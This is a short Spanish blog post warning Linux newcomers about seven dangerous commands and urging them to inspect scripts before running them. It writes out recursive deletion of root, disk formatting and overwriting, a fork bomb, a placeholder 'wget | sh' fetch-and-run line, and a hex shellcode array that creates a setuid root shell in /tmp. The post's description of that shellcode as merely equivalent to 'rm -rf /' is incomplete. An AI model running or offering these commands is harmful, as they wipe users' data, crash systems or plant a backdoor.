http://www.axlinux.es/2008/11/comandos-maliciosos-para-linux-que-no.html
Linux tampoco esta libre de usuarios malintencionados y si eres nuevo en este entorno no esta de mas que conozcas estas cosas. Existen comandos que no es recomendable ejecutar en nuestro sistema o evitar ejecutar si están contenidos dentro de shell scripts. Yo siempre digo que no hagáis Copy & Paste al tuntún de comandos, o si os bajáis algún script de un sitio que no conozcáis, lo editéis al menos antes y echéis un vistazo a su contenido para evitar luego males mayores.
Algunos de estos comandos “peligrosos” son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){:|:&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- | sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
No hay comentarios:
Publicar un comentario